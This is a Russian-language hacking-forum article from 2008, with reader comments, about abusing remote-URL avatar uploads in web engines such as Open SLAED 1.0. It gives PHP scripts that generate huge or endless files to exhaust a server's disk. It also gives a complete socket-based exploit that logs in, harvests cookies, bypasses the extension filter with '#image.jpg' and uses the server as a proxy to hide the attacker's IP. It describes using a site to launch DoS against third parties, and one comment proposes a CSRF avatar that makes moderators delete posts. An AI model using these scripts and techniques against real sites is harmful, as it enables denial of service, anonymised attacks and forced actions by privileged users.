В данной статье я хочу поговорить о CSRF-уязвимостях которые могут быть обнаружены в различных движках при загрузке файлов на сервер не с компьютера пользователя а со стороннего сайта. Подобных уязвимостей было найдено довольно много в очень популярных скриптах, таких как WordPress и phpBB, но до сих пор к ним относятся как к чему-то бесполезному. Но во многих движках имеются условия при которых можно пойти намного дальше. Разберём всё на примере аватаров. На многих движках/сайтах/форумах пользователи могут загружать свои аватары не только из галереи или своего ПК но и со сторонних сайтов. Для этого нужно лишь указать адрес нужной картинки. При указании аватара как URL на стороннем сайте может произойти 2 вещи: 1. В поле аватара запишется что то типа <img src='указанный_путь'>. 2. Сервер пройдёт по указанному URL и загрузит нужное изображение, сохранив его у себя. Рассмотрим несколько вариаций атак которые можно произвести с помощью таких функций. DOS-атака на сторонний сайт. При обоих вариантах, если отсутствует должная фильтрация передаваемых пользователями URL, злоумышленник может вызывать произвольные GET-запросы на сторонние сайты. С помощью этого он может использовать уязвимый сайт как площадку для DOS-атак на какой-либо сервер страдающий SQL-injection вызываемой GET-методом(DOS через BENCHMARK). В первом случае как атакующие будут выступать пользователи просмотревшие страничку с этим аватаром, во втором — сервер, ведь он будет вызывать необходимые действия при попытке загрузки картинки с указанного URL. Естественно вариант со вписыванием URL в тег <img> намного продуктивнее. Самое интересное здесь то что и в первом и во втором случаях на атакованном сервере будет записан IP не взломщика а либо пользователей, либо сервера. DDOS Self Такой вариант атак возможен только если скрипт загрузки файлов не проверяет их размер. Даже если скрипт после загрузки обнаружит что это не изображение и удалит файл то атака всё равно состоится. Суть здесь в том что бы заставить сервер загрузить к себе файл огромных размеров. Этот файл может быть чем угодно, главное что бы он занимал как можно больше места — хоть 1 Тб (хотя чаше всего достаточно лимита памяти выделяемого для PHP, это ~25-30мб). Для генерации таких файлов не нужно ничего выдумывать или копипастом выстраивать их в блокноте =) Можно просто использовать следующий скрипт на PHP: Code: <?php ini_set("max_execution_time",0); $size = 100000000;// Размер в байтах $content = ""; for($i = 0; $i < $size; $i++) { $content .= "A"; } $f = fopen('file.jpg','w'); fwrite($f,$content); fclose($f); ?> Если же вдруг Вам понадобиться отправить в отказ сервер, размер винчестера у которого больше вашего, то можете запрашивать не уже готовый файл а вызвать запрос к скрипту который будет бесконечно генерировать эти символы. Таким образом вы сразу убьёте двух зайцев — в пакете ответа от сервера не будет содержаться размер файла и для генерации даже гигабайтных файлов можно будет использовать не очень мощный компьютер потому что соединение будет держаться пока либо не оборвётся из-за проблем со связью, либо пока файл не сгенерируется до конца. Вот пример такого скрипта: Code: <?php @ini_set("max_execution_time",0); header('Content-type: image/jpeg'); $size = 100000000;// Размер в байтах (100mb) for($i = 0; $i < $size; $i++) { print "A"; } ?> Заголовок здесь устанавливается на тот случай если скрипт сначала произведёт head-запрос и проверит из его результата тип получаемого файла. Хотя такие проверки я не встречал ни разу. Больший эффект может доставить несколько сотен таких запросов на получение файлов гигантского или бесконечного (за место for(...) - while(true) что бы файл генерировался без конца) объёма — это очень сильно забьёт канал, но это уже из раздела мистики =). Proxy Emitation Данный вариант атак возможен если сервер не проверяет тип загруженного файла или проверяет но всё равно оставляет загруженную информацию у себя. При таких атаках нападающий заставляет сервер загрузить содержимое произвольного URL к себе, а потом просто обращается к сохранённому документу получая таким образом результат совершённого сервером GET-запроса. Для лучшего понимания рассмотрим подобную уязвимость в Open SLAED 1.0. Я установил его на хост «slaed» в денвере. Вам желательно установить его на тот же хост, дабы избежать путаницы. Зарегистрируем нового пользователя и пройдём в редактирование профиля. В разделе «Настройки аватара», в поле «Загрузить аватар по ссылке» укажем любой хост (например http://localhost/index.php) и в конце URL сделаем следующую приписку: #image.jpg. Это нужно для обхода фильтрации по расширению. Теперь жмите на «сохранить изменения» и пройдите в папку [директория_slaed]/uploads/avatars/. Здесь лежат аватары загруженные пользователям. В этой директории должен появиться новый файл с произвольно генерированным именем типа «5-15waSfiKQ3.jpg». Если Вы откроете его в текстовом редакторе то обнаружите внутри html-код страницы которую Вы указали как аватар. Получается что сервер уже можно использовать как прокси для GET-запросов. Вот и сама суть «Proxy Emitation». Естественно нам здесь не обойтись без эксплойта т.к. в ручную проделывать подобные операции не очень хочется. Для начала подумаем что же наш эксплоит должен делать: 1. Авторизироваться на сайте. 2. Обновлять профиль. 3. Читать содержимое получившегося файла. Всё это писать лучше на PHP и в браузерном варианте потому что полученный html-код нужно будет отобразить =). Для работы с http мы будем использовать сокеты. Сейчас мы поэтапно реализуем нашу идею. Начнём с авторизации. Для начала нам нужно определить несколько обязательных переменных. А именно: 1. Хост с установленным slaed 2. Порт 3. Директорию 4. Нужный нам URL на который нужно будет отправить запрос 5. Логин пользователя и пароль У меня для этих переменных определены следующие значения: Code: $host = "slaed"; $port = 80; $dir = "/"; $need_url = "http://phpBB3/index.php"; $login = "WT"; $password = "exploit"; Теперь реализация авторизации пользователя. Для того что бы войти на сайт модулю account нужно передать 2 параметра — user_name и user_password POST-методом. В коде это будет выглядеть так: Code: $in = ""; # Текст запроса $out = ""; # Ответ от сервера $cookies = ""; # Куки # Определяем длинну передаваемого контента для поля Content-Length $params = "user_name={$login}&user_password={$password}&op=login"; $content_size = strlen($params); # POST-запрос на авторизацию $socket = fsockopen($host,$port); $in .= "POST {$dir}index.php?name=account HTTP/1.1\r\n"; $in .= "Host: {$host}\r\n"; $in .= "Content-Type: application/x-www-form-urlencoded\r\n"; $in .= "Cookie: lang=russian;\r\n"; $in .= "User-Agent: Exploit for OpenSLAED 1.0 from White-Team\r\n"; $in .= "Content-Length: {$content_size}\r\n"; $in .= "Connection: Close\r\n\r\n"; $in .= $params; fwrite($socket, $in); while (!feof($socket)) { $out .= fgets($socket, 128); } fclose($socket); После выполнения этого кода в переменную $out будет помещён ответ сервера. Единственное что нам нужно от него — cookies. Для этого можно использовать обычное регулярное выражение: Code: $matches = Array(); preg_match_all("#Set-Cookie:(.*?)=(.*?);#s",$out,$matches); if(!$matches[2][1]) die("Login failed!"); $session = $matches[1][0]."=".$matches[2][0]; $user_data = $matches[1][1]."=".$matches[2][1]; # Помещаем в $cookies полученную информацию $cookies = $session."; ".$user_data.";"; После работы функции preg_match_all() в ячейке $matches[1][0] будет храниться имя сессии а в $matches[2][0] — идентификатор. В $matches[1][1] — имя куков пользовательской информации, ну и в $matches[2]1] — логин, пароль и id пользователя в base64. Эту информацию мы в итоге объединяем в переменной $cookies и у нас получается готовая строка куков. Теперь мы сможем включать её в любой запрос и всегда будем авторизированы. Следующим шагом нам нужно послать запрос на изменение аватара, указав как URL для загрузки нужный нам источник: Code: # Обновляем профиль # Обнуляем старое содержимое запроса и ответа $in = ""; $out = ""; $content = " ------------X4B06AurV6QlvznREFWDn2 Content-Disposition: form-data; name=\"userfile\"; filename=\"\" ------------X4B06AurV6QlvznREFWDn2 Content-Disposition: form-data; name=\"sitefile\" {$need_url}#image.png ------------X4B06AurV6QlvznREFWDn2 Content-Disposition: form-data; name=\"op\" saveavatar ------------X4B06AurV6QlvznREFWDn2-- "; $content_size = strlen($content); $socket = fsockopen($host,$port); $in .= "POST {$dir}index.php?name=account HTTP/1.1\r\n"; $in .= "Host: {$host}\r\n"; $in .= "Content-Type: multipart/form-data; boundary=----------X4B06AurV6QlvznREFWDn2\r\n"; $in .= "User-Agent: Exploit for OpenSLAED 1.0 from White-Team\r\n"; $in .= "Cookie: lang=russian; {$cookies}\r\n"; $in .= "Content-Length: {$content_size}\r\n"; $in .= "Connection: Close\r\n\r\n"; $in .= $content; fwrite($socket, $in); while (!feof($socket)) { $out .= fgets($socket, 128); } fclose($socket); Всё, запрос отослан. Сервер прошёл по указанному адресу и сохранил содержимое в отдельном файле с расширением «.png». Теперь нам нужно лишь получить имя изображения. Для этого мы просто обратимся к странице редактирования профиля и с помощью регулярного выражения выдернем из неё то что нам нужно: Code: // Смотрим профиль, получаем имя аватара $in = ""; $out = ""; $socket = fsockopen($host,$port); $in .= "GET {$dir}index.php?name=account&op=edithome HTTP/1.1\r\n"; $in .= "Host: {$host}\r\n"; $in .= "User-Agent: Exploit for OpenSLAED 1.0 from White-Team\r\n"; $in .= "Cookie: lang=russian; {$cookies}\r\n"; $in .= "Connection: Close\r\n\r\n"; fwrite($socket, $in); while (!feof($socket)) { $out .= fgets($socket, 128); } fclose($socket); $matches = Array(); preg_match("#<img src=\"uploads/avatars/(.*?)\">#",$out,$matches); $image = $matches[1]; Теперь в переменной $image лежит имя нового изображения. Всё готово для того что бы обратиться к нему и вывести полученную информацию на экран: Code: // Загружаем запрошенный контент $in = ""; $out = ""; $socket = fsockopen($host,$port); $in .= "GET {$dir}uploads/avatars/{$image} HTTP/1.1\r\n"; $in .= "Host: {$host}\r\n"; $in .= "User-Agent: Exploit for OpenSLAED 1.0 from White-Team\r\n"; $in .= "Cookie: lang=russian; {$cookies}\r\n"; $in .= "Connection: Close\r\n\r\n"; fwrite($socket, $in); while (!feof($socket)) { $out .= fgets($socket, 128); } fclose($socket); # Выводим то что запросил пользователь print $out; Теперь можно эксплоит протестировать. Обратимся к нему через браузер: Не идеал конечно, но мы выполнили то что хотели — получили со стороннего сервера информацию при этом не оставив там свой IP. Если потратить побольше времени то можно дописать эксплоит так что бы он изменял все пути изображений/css-файлов на себя и грузил их, не превращая при этом вид страницы в то что указано выше на скриншоте. Автор: Kuzya. (с) White-Team(http://white-team.net), 2008.
Автор знает толк в извращениях) Только вот смысла не вижу ни в ддосе (по моральным соображениям), ни в эмуляции прокси (по практическим)
ну да мы протев ДОСов и протев ДЕФЕЙСОВ (с)NO-FEAR)) а вот насчет прокси ... можно таким образом скомпрометировать сервер. или я ошибаюсь ?
да даж не в этом дело. ты путаешь личные принципами с принципами ачата сервер взломал другой сервер?) терминаторы воюют в интернете?) тут скорее интерес, нежели практическое использование несколько похожий концепт имхо http://xss-proxy.sourceforge.net/
Вы правы. Врят-ли кто-то будет применять такое широко на практике. Подобные атаки используются очень редко, и то для точечных нападений. Просто исследовательский интерес.
Особенно порадовала презентация ... доступно и по делу. Концепт может и похожий... а вот реализация совершенно другая.
По моему в статье не написано главного - о возможности выполнения ф-ций, доступных привилигерованным пользоватеям. Главное условие - чтобы эти ф-ции в движке вызывалась гет-запросом. Допустим читает модератор чужую тему, и внизу есть ссылочка "стереть тему" http://forum.com/index.php?post=423434&delete, переходя по ссыле тема сразу стирается. И все, делаем аватар который ссылается на эту ссылу, когда модер прочтет ваш пост с этим аватаром, его браузер автоматически пройдет по ссыле... Правда ситуация вымышленная, и наверно движков где серьезные ф-ции выполняются одним гет-запросом раз-два и опчелся...
Кузе, как всегда, зач0т всесторонний он написал книжку, в которой собрал кучу простых и понятных вещей, которые реально пригождаются
